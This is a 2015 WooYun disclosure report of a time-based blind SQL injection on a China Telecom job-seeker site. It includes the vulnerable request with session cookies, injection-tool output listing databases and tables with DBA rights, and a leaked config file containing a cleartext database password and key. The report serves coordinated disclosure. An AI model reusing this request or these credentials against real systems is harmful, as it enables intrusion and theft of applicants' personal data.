当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142490

漏洞标题:中国电信某站SQL注入漏洞(时间盲注/DBA权限/大量信息泄露)

相关厂商:中国电信

漏洞作者: 路人甲

提交时间:2015-09-24 23:03

修复时间:2015-11-13 10:08

公开时间:2015-11-13 10:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-24: 细节已通知厂商并且等待厂商处理中
2015-09-29: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-10-09: 细节向核心白帽子及相关领域专家公开
2015-10-19: 细节向普通白帽子公开
2015-10-29: 细节向实习白帽子公开
2015-11-13: 细节向公众公开

简要描述:

RT

详细说明:

URL:http://**.**.**.**
测试:

GET /shixibao/cp.php?residecity=&name=aaa&username=&searchsubmit=%B2%E9%D5%D2&ac=friend&op=search&type=base HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 QIHU 360EE
Referer: http://**.**.**.**/shixibao/cp.php?ac=friend&op=search&view=reside
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=9pn1vm0akovauie5a335c5tvb2; lvid=b19139a2392c542f441d7e58c619e264; nvid=1; s_pers=%20s_fid%3D45636F5C10EB727B-2D660E17E30AF73F%7C1505822950638%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Deshipeship-189-all%253D%252526pid%25253D%2525252Freg2%252526pidt%25253D1%252526oid%25253Djavascript%2525253A%2525253B%252526ot%25253DA%3B; DQMHStanduserId=20150000000032913522; userId=1%7C20150000000032913522; dqmhIpCityInfos=%E5%8C%97%E4%BA%AC%E5%B8%82+%E8%81%94%E9%80%9A; loginStatus=logined; __qc_wId=356; pgv_pvid=5871468180; trkHmPageName=%2Fbj%2F; trkHmCoords=0; trkHmCity=0; trkHmLinks=0; cityCode=bj; SHOPID_COOKIEID=10001; s_cc=true; s_fid=48FC7A85226ECCFE-18831160BEDE3A5D; s_sq=eshipeship-189-all%3D%2526pid%253D%25252Fdqmh%25252FuserCenter%25252FmyOrderInfoList.do%25253Fmethod%25253DmangeAddr%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252F**.**.**.**%25252Fdqmh%25252FssoLink.do%25253Fmethod%25253Dskip%252526platNo%25253D93505%252526toStUrl%25253Dhttp%25253A%25252F%25252F**.**.**.**%2526ot%253DA; trkHmClickCoords=1284%2C8; LSID=aSEUDBw0HFa8WvQGL-; uchome_view_blogid=205; jiathis_rdc=%7B%22http%3A//**.**.**.**/shixibao/space.php%3Fuid%3D52131%26do%3Dblog%26id%3D206%22%3A0%7C1442665279182%2C%22http%3A//**.**.**.**/shixibao/space.php%3Fuid%3D52114%26do%3Dblog%26id%3D205%22%3A%220%7C1442665846816%22%7D; jnfbygbookbid=1; jnfbyloginnum=2; jnfbylastlogintime=1442666836; uchome_seccode=744dI4LaOKteAVAbz6x7ThTGunfUfl3SGWhujNXCP8LL; uchome_auth=b589k0qHxDIqjn39rocSgwJnruaOoGoBmKJdjDWIfJuO40SCQCR3ymxPdtHYKPyw5w3i5lvXx0EgEWG30JINuKiCIQ; uchome_loginuser=testwooyun; uchome_jnfbymluserid=52131; uchome_synfriend=1; uchome_reurl=%252Fshixibao%252Fcp.php%253Fac%253Dzhiwei_result_detail%2526ignore%253D1%2526jobid%253D6656; uchome_checkpm=1; uchome_sendmail=1; CNZZDATA1252975852=2119416073-1442662706-null%7C1442662706

漏洞证明:

32.jpg


权限和用户:

current user is DBA:    True
current user: 'admin@%'


数据库(16个):

available databases [16]:
[*] cdcol
[*] cem_db
[*] game
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] shixibao
[*] shixibao_uc
[*] shixibao_uchome
[*] shixibao_uchome_20140525
[*] test
[*] testmql
[*] ultrax
[*] webauth
[*] zhiweibeifen


shixibao_uchome:

[182 tables]
+----------------------------+
| dajie |
| jobcollect |
| mm_attach_files |
| mm_audition_task |
| mm_audition_user |
| mm_city |
| mm_company_interest |
| mm_company_visitor |
| mm_compus_news |
| mm_compus_posdeli_view |
| mm_delivercont_view |
| mm_delivery |
| mm_delivery_attach |
| mm_department |
| mm_dept_location |
| mm_deptinfo |
| mm_dynamic |
| mm_employinfo |
| mm_employinfo_view |
| mm_enterprise_zhaopin |
| mm_follow |
| mm_grade_template |
| mm_grades_enter |
| mm_grades_user |
| mm_hgz_user |
| mm_home_card |
| mm_interview_notice |
| mm_jianzhi_delivery |
| mm_like |
| mm_lucky_log |
| mm_lucky_wall |
| mm_mail_template |
| mm_mailqueue |
| mm_member_view |
| mm_parttime_job |
| mm_personal_zhaopin |
| mm_post_attachment |
| mm_post_recommend |
| mm_postclass |
| mm_postclass_detail |
| mm_praise |
| mm_provinces |
| mm_questions |
| mm_questions_view |
| mm_replayments |
| mm_replayments_view |
| mm_report |
| mm_score |
| mm_score_eachsum |
| mm_score_item |
| mm_score_mark |
| mm_score_marker |
| mm_score_stat |
| mm_score_task |
| mm_score_template |
| mm_strategies |
| mm_students_star |
| mm_subscribe_job |
| mm_talent_pool |
| mm_task |
| mm_task_attach |
| mm_task_mapping |
| mm_taskcompany_map |
| mm_taskuser_map |
| mm_themes |
| mm_univs |
| mm_user_upload |
| mm_userbaseinfo |
| mm_usercode_map |
| mm_usereduinfo |
| mm_userinfo |
| mm_userinfo_zhiweiinfo_all |
| mm_userreg_channel |
| mm_userresumeinfo |
| mm_userskill_map |
| mm_useruniversmap |
| mm_userunivsmap_view |
| mm_video_course |
| mm_video_score |
| mm_video_wall |
| mm_whos_online |
| mm_work |
| mm_work_comment |
| mm_young_report |
| mm_young_report_map |
| mm_young_tribe |
| mm_younger_gd_temp |
| mm_youngmembers |
| mm_zhiwei_questions |
| mm_zhiwei_replayments |
| mm_zhiwei_send |
| mm_zhiwei_temp |
| mm_zhiweiapply_view |
| mm_zhiweiapply_view_1 |
| mm_zhiweiinfo |
| mm_ztask_classify |
| uchome_activity_notice |
| uchome_ad |
| uchome_adminsession |
| uchome_album |
| uchome_appcreditlog |
| uchome_blacklist |
| uchome_block |
| uchome_blog |
| uchome_blogfield |
| uchome_cache |
| uchome_class |
| uchome_click |
| uchome_clickuser |
| uchome_comment |
| uchome_config |
| uchome_coupon |
| uchome_creditlog |
| uchome_creditrule |
| uchome_cron |
| uchome_data |
| uchome_docomment |
| uchome_doing |
| uchome_event |
| uchome_eventclass |
| uchome_eventfield |
| uchome_eventinvite |
| uchome_eventpic |
| uchome_feed |
| uchome_friend |
| uchome_friendguide |
| uchome_friendlog |
| uchome_home_card |
| uchome_invite |
| uchome_job |
| uchome_log |
| uchome_magic |
| uchome_magicinlog |
| uchome_magicstore |
| uchome_magicuselog |
| uchome_mailcron |
| uchome_mailqueue |
| uchome_member |
| uchome_member_extend |
| uchome_member_third |
| uchome_mtag |
| uchome_mtaginvite |
| uchome_myapp |
| uchome_myinvite |
| uchome_notification |
| uchome_pic |
| uchome_picfield |
| uchome_poke |
| uchome_poll |
| uchome_pollfield |
| uchome_polloption |
| uchome_polluser |
| uchome_post |
| uchome_profield |
| uchome_profilefield |
| uchome_report |
| uchome_resume |
| uchome_session |
| uchome_share |
| uchome_show |
| uchome_space |
| uchome_spacefield |
| uchome_spaceinfo |
| uchome_spacelog |
| uchome_stat |
| uchome_statuser |
| uchome_tag |
| uchome_tagblog |
| uchome_tagspace |
| uchome_task |
| uchome_thread |
| uchome_topic |
| uchome_topicuser |
| uchome_userapp |
| uchome_userappfield |
| uchome_userevent |
| uchome_usergroup |
| uchome_userlog |
| uchome_usermagic |
| uchome_usertask |
| uchome_visitor |
| uchome_zan |
+----------------------------+


shixibao_uchome -> mm_userinfo 35895条用户资料信息
还有一些侧漏的东西:
1.http://**.**.**.**/shixibao/config.php.bak

应用管理->查看本应用->复制里面对应的配置信息进行替换) define('UC_CONNECT', 'mysql'); // 连接 UCenter 的方式: mysql/NULL, 默认为空时为 fscoketopen(), mysql 是直接连接的数据库, 为了效率, 建议采用 mysql define('UC_DBHOST', '**.**.**.**'); // UCenter 数据库主机 define('UC_DBUSER', 'admin'); // UCenter 数据库用户名 define('UC_DBPW', 'ctbri4008118114'); // UCenter 数据库密码 define('UC_DBNAME', 'shixibao_uc'); // UCenter 数据库名称 define('UC_DBCHARSET', 'gbk'); // UCenter 数据库字符集 define('UC_DBTABLEPRE', '`shixibao_uc`.uc_'); // UCenter 数据库表前缀 define('UC_DBCONNECT', '0'); // UCenter 数据库持久连接 0=关闭, 1=打开 define('UC_KEY', 'abc123'); // 与 UCenter 的通信密钥, 要与 UCenter 保持一致 define('UC_API', 'http://**.**.**.**/shixibao/ucenter'); // UCenter 的 URL 地址, 在调用头像时依赖此常量 define('UC_CHARSET', 'gbk'); // UCenter 的字符集 define('UC_IP', '**.**.**.**'); // UCenter 的 IP, 当 UC_CONNECT 为非 mysql 方式时, 并且当前应用服务器解析域名有问题时, 请设置此值 define('UC_APPID', '4'); // 当前应用的 ID define('UC_PPP', 20);

2.备份:
http://**.**.**.**/shixibao/data.rar

修复方案:

保护应聘者的信息

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-09-29 10:06

厂商回复:

CNVD确认所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理单位处置

最新状态:

暂无